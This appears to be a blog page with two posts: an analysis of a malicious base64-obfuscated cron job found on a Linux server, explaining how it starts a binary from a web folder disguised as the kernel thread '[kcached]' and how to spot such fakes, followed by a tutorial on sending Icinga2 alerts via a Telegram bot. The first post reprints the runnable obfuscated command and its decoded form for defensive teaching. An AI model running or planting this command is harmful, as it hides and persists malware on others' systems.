{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random

And for most people in that subreddit several things were immediately obvious:

  1. The commands are obfuscated by encoding them in base64 - a very common method to, sort of, hide malicious contents
  2. As such this is, most likely, a harmful, malicious CronJob not created by a legitimate user of that system
  3. The person asking lacks basic Linux knowledge as the |base64 -d|bash; part clearly states that the base64-string is decoded and piped into a bash process to be executed
    • Anyone with basic knowledge would simply have taken the string and piped it into base64 -d retrieving the decoded string for further analysis without executing it.

And if we do exactly that, we get the following decoded string:

user@host:~ $ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDA0IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L2Jpbi9iYXNoIFRFUk09eHRlcm0tMjU2Y29sb3IgR1NfQVJHUz0iLWsgL2hvbWUvYWRtaW4vd3d3L2dzLWRidXMuZGF0IC1saXFEIiAvdXNyL2Jpbi9iYXNoIC1jICJleGVjIC1hICdba2NhY2hlZF0nICcvaG9tZS9hZG1pbi93d3cvZ3MtZGJ1cyciIDI+L2Rldi9udWxsCg==|base64 -d
/usr/bin/pkill -0 -U1004 gs-dbus 2>/dev/null || SHELL=/bin/bash TERM=xterm-256color GS_ARGS="-k /home/admin/www/gs-dbus.dat -liqD" /usr/bin/bash -c "exec -a '[kcached]' '/home/admin/www/gs-dbus'" 2>/dev/null

What these commands do is explained fairly simply: pkill checks (the -0 parameter) if a process named gs-dbus is already running under the user ID 1004. If a process is found, pkill exits with 0 and everything after the || (logical OR) is not executed.

The right part of the OR is only executed when pkill exits with 1 because no process named gs-dbus was found. On the right part a few environment variables and parameters are set, the /home/admin/www/gs-dbus binary is started and the process is renamed to [kcached].
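The renaming is done by bash's exec -a, which sets argv[0] of the new process. A harmless demonstration of the same trick, using sleep as a stand-in (PIDs and usernames will of course differ):

user@host:~$ bash -c "exec -a '[kcached]' sleep 300" &
user@host:~$ ps -o pid,ppid,user,args -C sleep
    PID    PPID USER     COMMAND
  12345    4242 user     [kcached] 300

The args column shows the faked name, while the PPID and the non-root user immediately give it away as a normal user process - more on that below.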

And while this explains what is logically happening, it still doesn't explain what this CronJob actually does.

Now another person explained that it is the gs-dbus service from Gnome being started if it isn't already running, and claimed it is probably safe. Why this person came to this conclusion is beyond me. Probably because https://gitlab.gnome.org/GNOME/gnome-software/-/blob/main/src/gs-dbus-helper.c shows up as a result if you just search for gs-dbus. But again, this person overlooked some critical pieces of information.

And this made me take the time to write this little blogpost about how to approach such situations.

There are some crucial pieces of evidence which immediately tell me that this is not a legitimate piece of software:

  1. Base64-encoded strings which get executed via bash are almost never doing anything good
  2. If that software really belongs to Gnome you have Systemd unit-Files or Timers. Or if that is a system without Systemd: You got good old init. But then again there would, most likely, be some kind of Gnome sub-process started by Gnome itself and not some obfuscated CronJob
  3. Renaming the process name to [kcached] makes it look like a kernel level thread. If there is an equivalent to the "world's biggest warning sign", this is it.
  4. The binary being started is /home/admin/www/gs-dbus. Notice www being the folder where the binary is stored? Yeah, that is always an indicator that files in that folder are reachable via a webserver. Hence I assume that /home/admin/www/ hosts some vulnerable web application and this was the entry point for the malicious software & CronJob.

What the person missed is: processes in square brackets are always kernel level threads, which run as root and have a parent process ID (PPID) of 2. This means someone is renaming a process started by a non-root user to make it look like a kernel level thread - obviously to deceive the users and security mechanisms of that system. There is no legitimate reason to do so.

Would you investigate further or even kill that process when some scanning software reports a kernel level thread? Well, the obvious answer is: Of course, YES! But far too many inexperienced users won't.

All processes with [] around them are started by kthreadd - the Kernel Thread Daemon. kthreadd itself is started by the kernel during boot.

Therefore we have 3 truths about kernel level threads:

  1. They will always have the process ID 2 as their parent process ID (PPID)
  2. They will always run as root, never as a user
  3. They will always be started by [kthreadd] itself

Let's take a look at the following ps output from one of my Debian systems. I'll make it quick & dirty and simply grep for all processes with a [ in them.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
      3       2 root     rcu_gp          [rcu_gp]
      4       2 root     rcu_par_gp      [rcu_par_gp]
      5       2 root     slub_flushwq    [slub_flushwq]
      6       2 root     netns           [netns]
      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd] itself, which actually owns PID 2 and got started by PPID 0, the second is my grep command and the two others are from sshd. But only [kthreadd] is actually enclosed in square brackets, as it doesn't have a command line.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.

And this is why basics are so important. Do not just assume a piece of software is doing nothing bad because "there is some piece of legitimate software out there on the Internet sharing the same name". Anyone can lie. And the bad people most likely are.

Comments

Icinga2 Monitoring notifications via Telegram Bot (Part 1)

Photo by Kindel Media: https://www.pexels.com/photo/low-angle-shot-of-robot-8566526/

One thing I wanted to set up for a long time was to get my Icinga2 notifications via some of the Instant Messaging apps I have on my mobile. So there was Threema, Telegram and Whatsapp to choose from.

Well... Threema wants money for this kind of service, and Whatsapp requires a business account which must be connected with the bot. And Whatsapp Business means I have to pay again? - Don't know, didn't pursue that path any further, as it either meant I would've needed to convert my private account into a business account or get a second account. No, sorry. Not something I want.

Telegram on the other hand? "Yeah, well, message the @botfather account, type /start, type /newbot, set a display and username, get your Bot-Token (for API usage), that's it. The only requirement we have? The username must end in bot." From here it was an easy decision which app I chose. (Telegram documentation here.)

Creating your telegram bot

  1. Search for the @botfather account on Telegram; doesn't matter if you use the mobile app or do it via Telegram Web.
  2. Type /start and a help message will be displayed.
  3. To create a new bot, type: /newbot
  4. Via the question "Alright, a new bot. How are we going to call it? Please choose a name for your bot." you are asked for the display name of your bot.
    • I chose something generic like "Icinga Monitoring Notifications".
  5. Likewise the question "Good. Now let's choose a username for your bot. It must end in `bot`. Like this, for example: TetrisBot or tetris_bot." asks for the username.
    • Choose whatever you like.
  6. If the username is already taken Telegram will state this and simply ask for a new username until you find one which is available.
  7. In the final message you will get your token to access the HTTP API. Note this down and save it in your password manager. We will need this later for Icinga.
  8. To test everything send a message to your bot in Telegram

That's the Telegram part. Pretty easy, right?

Testing our bot from the command line

We are now able to receive (via /getUpdates) and send (via /sendMessage) messages from/to our bot. Define the token as a shell variable and execute the following curl command to get the messages that were sent to your bot. Note: only new messages are returned. If you have already viewed them in Telegram Web the response will be empty, as seen in the first executed curl command.

Just close Telegram Web and the app on your phone, send a new message to your bot and then fetch it via curl. This should do the trick. Later we define our API-Token as a constant in the Icinga2 configuration.

For better readability I pipe the output through jq.

When there is a new message from your Telegram account to your bot, you will see a field named id. Note this number down. This is the Chat-ID of your account, and we need it so that your bot can actually send you messages.

Relevant documentation links are:

user@host:~$ TOKEN="YOUR-TOKEN"
user@host:~$ curl --silent "https://api.telegram.org/bot${TOKEN}/getUpdates" | jq
{
  "ok": true,
  "result": []
}
user@host:~$ curl --silent "https://api.telegram.org/bot${TOKEN}/getUpdates" | jq
{
  "ok": true,
  "result": [
    {
      "update_id": NUMBER,
      "message": {
        "message_id": 3,
        "from": {
          "id": CHAT-ID,
          "is_bot": false,
          "first_name": "John Doe Example",
          "username": "JohnDoeExample",
          "language_code": "de"
        },
        "chat": {
          "id": CHAT-ID,
          "first_name": "John Doe Example",
          "username": "JohnDoeExample",
          "type": "private"
        },
        "date": 1694637798,
        "text": "This is a test message"
      }
    }
  ]
}
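
With the Chat-ID noted down we can also do the reverse and send ourselves a test message from the shell via the Bot API's sendMessage method - a quick check (replace YOUR-CHAT-ID accordingly):

user@host:~$ CHAT_ID="YOUR-CHAT-ID"
user@host:~$ curl --silent "https://api.telegram.org/bot${TOKEN}/sendMessage" --data chat_id="${CHAT_ID}" --data text="Test from the shell" | jq '.ok'
true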

Configuring Icinga2

Now we need to integrate our bot into the Icinga2 notification process. Luckily there were many people before us doing this, so there are already some notification scripts and example configuration files on GitHub.

I choose the scripts found here: https://github.com/lazyfrosch/icinga2-telegram

As I use the distributed monitoring I store some configuration files beneath /etc/icinga2/zones.d/. If you don't use this, feel free to store those files somewhere else. However, as I define the token in /etc/icinga2/constants.conf, which isn't synced via the config file sync, I have to make sure that the notification configuration is also stored outside of /etc/icinga2/zones.d/. Otherwise the distributed setup will fail, as the config file sync throws a syntax error on all other machines due to the missing TelegramBotToken constant.

First we define the API-Token in the /etc/icinga2/constants.conf file:

user@host:/etc/icinga2$ grep -B1 TelegramBotToken constants.conf
/* Telegram Bot Token */
const TelegramBotToken = "YOUR-TOKEN-HERE"

Afterwards we download the host and service notification scripts into /etc/icinga2/scripts and set the executable bit.

user@host:/etc/icinga2/scripts$ wget https://raw.githubusercontent.com/lazyfrosch/icinga2-telegram/master/telegram-host-notification.sh
user@host:/etc/icinga2/scripts$ wget https://raw.githubusercontent.com/lazyfrosch/icinga2-telegram/master/telegram-service-notification.sh
user@host:/etc/icinga2/scripts$ chmod +x telegram-host-notification.sh telegram-service-notification.sh

Based on the notifications we want to receive, we need to define the variable vars.telegram_chat_id in the appropriate user/group object(s). An example for the icingaadmin is shown below and can be found in the icinga2-example.conf on GitHub: https://github.com/lazyfrosch/icinga2-telegram/blob/master/icinga2-example.conf along with the notification commands which we are setting up after this.

user@host:~$ cat /etc/icinga2/zones.d/global-templates/users.conf
object User "icingaadmin" {
  import "generic-user"

  display_name = "Icinga 2 Admin"
  groups = [ "icingaadmins" ]

  email = "root@localhost"
  vars.telegram_chat_id = "YOUR-CHAT-ID-HERE"
}

Notifications for Host & Service

We need to define 2 new NotificationCommand objects which trigger the telegram-(host|service)-notification.sh scripts. These are stored in /etc/icinga2/conf.d/telegrambot-commands.conf.

Note: We store the NotificationCommands and Notifications in /etc/icinga2/conf.d and NOT in /etc/icinga2/zones.d/master. This is because I have only one master in my setup which sends out notifications, and because we defined the constant TelegramBotToken in /etc/icinga2/constants.conf - which is not synced via the zone config sync. Otherwise we would run into a syntax error on all Icinga2 agents.

See https://admin.brennt.net/icinga2-error-check-command-does-not-exist-because-of-missing-constant for details.

Of course we could also define the constant in a file under /etc/icinga2/zones.d/master but I chose not to do so for security reasons.

user@host:/etc/icinga2$ cat /etc/icinga2/conf.d/telegrambot-commands.conf
/*
 * Notification Commands for Telegram Bot
 */
object NotificationCommand "telegram-host-notification" {
  import "plugin-notification-command"

  command = [ SysconfDir + "/icinga2/scripts/telegram-host-notification.sh" ]

  env = {
    NOTIFICATIONTYPE = "$notification.type$"
    HOSTNAME = "$host.name$"
    HOSTALIAS = "$host.display_name$"
    HOSTADDRESS = "$address$"
    HOSTSTATE = "$host.state$"
    LONGDATETIME = "$icinga.long_date_time$"
    HOSTOUTPUT = "$host.output$"
    NOTIFICATIONAUTHORNAME = "$notification.author$"
    NOTIFICATIONCOMMENT = "$notification.comment$"
    HOSTDISPLAYNAME = "$host.display_name$"
    TELEGRAM_BOT_TOKEN = TelegramBotToken
    TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"

    // optional
    ICINGAWEB2_URL = "https://host.domain.tld/icingaweb2"
  }
}

object NotificationCommand "telegram-service-notification" {
  import "plugin-notification-command"

  command = [ SysconfDir + "/icinga2/scripts/telegram-service-notification.sh" ]

  env = {
    NOTIFICATIONTYPE = "$notification.type$"
    SERVICEDESC = "$service.name$"
    HOSTNAME = "$host.name$"
    HOSTALIAS = "$host.display_name$"
    HOSTADDRESS = "$address$"
    SERVICESTATE = "$service.state$"
    LONGDATETIME = "$icinga.long_date_time$"
    SERVICEOUTPUT = "$service.output$"
    NOTIFICATIONAUTHORNAME = "$notification.author$"
    NOTIFICATIONCOMMENT = "$notification.comment$"
    HOSTDISPLAYNAME = "$host.display_name$"
    SERVICEDISPLAYNAME = "$service.display_name$"
    TELEGRAM_BOT_TOKEN = TelegramBotToken
    TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"

    // optional
    ICINGAWEB2_URL = "https://host.domain.tld/icingaweb2"
  }
}

As I want to get all notifications for all hosts and services I simply apply the notification objects to all hosts and services which have host.name set - same as in the example.

user@host:/etc/icinga2$ cat /etc/icinga2/conf.d/telegrambot-notifications.conf
/*
 * Notifications for alerting via Telegram Bot
 */
apply Notification "telegram-icingaadmin" to Host {
  import "mail-host-notification"
  command = "telegram-host-notification"

  users = [ "icingaadmin" ]

  assign where host.name
}

apply Notification "telegram-icingaadmin" to Service {
  import "mail-service-notification"
  command = "telegram-service-notification"

  users = [ "icingaadmin" ]

  assign where host.name
}

Checking configuration

Now we check if our Icinga2 config has no errors and reload the service:

root@host:~ # icinga2 daemon -C
[2023-09-14 22:19:37 +0200] information/cli: Icinga application loader (version: r2.12.3-1)
[2023-09-14 22:19:37 +0200] information/cli: Loading configuration file(s).
[2023-09-14 22:19:37 +0200] information/ConfigItem: Committing config item(s).
[2023-09-14 22:19:37 +0200] information/ApiListener: My API identity: hostname.domain.tld
[2023-09-14 22:19:37 +0200] information/ConfigItem: Instantiated 1 NotificationComponent.
[...]
[2023-09-14 22:19:37 +0200] information/ScriptGlobal: Dumping variables to file '/var/cache/icinga2/icinga2.vars'
[2023-09-14 22:19:37 +0200] information/cli: Finished validating the configuration file(s).
root@host:~ # systemctl reload icinga2.service

Verify it works

Log into your Icingaweb2 frontend, click the Notification link for a host or service and trigger a custom notification.
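
Alternatively, the notification script can be exercised directly from the shell - a rough sketch, assuming it only needs the environment variables we pass in the NotificationCommand above (all values are placeholders):

user@host:~$ NOTIFICATIONTYPE="CUSTOM" HOSTNAME="testhost" HOSTDISPLAYNAME="testhost" \
    HOSTALIAS="testhost" HOSTADDRESS="127.0.0.1" HOSTSTATE="UP" HOSTOUTPUT="Manual test" \
    LONGDATETIME="$(date)" NOTIFICATIONAUTHORNAME="me" NOTIFICATIONCOMMENT="Testing the bot" \
    TELEGRAM_BOT_TOKEN="YOUR-TOKEN" TELEGRAM_CHAT_ID="YOUR-CHAT-ID" \
    /etc/icinga2/scripts/telegram-host-notification.sh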

And we have a message in Telegram:

What about CheckMK?

If you use CheckMK see this blogpost: https://www.srcbox.net/posts/monitoring-notifications-via-telegram/

Lessons learned

And if you use this setup you will encounter one situation/question rather quickly: Do I really need to be woken up at 3am for every notification?

No. No you don't want to. Not in a professional context and even less in a private context.

Therefore: In part 2 we will register a second bot account and then use the two bots to differentiate between important and unimportant notifications. The unimportant ones will be muted in the Telegram client on our smartphone. The important ones won't be, and are therefore able to wake us at 3am.

Comments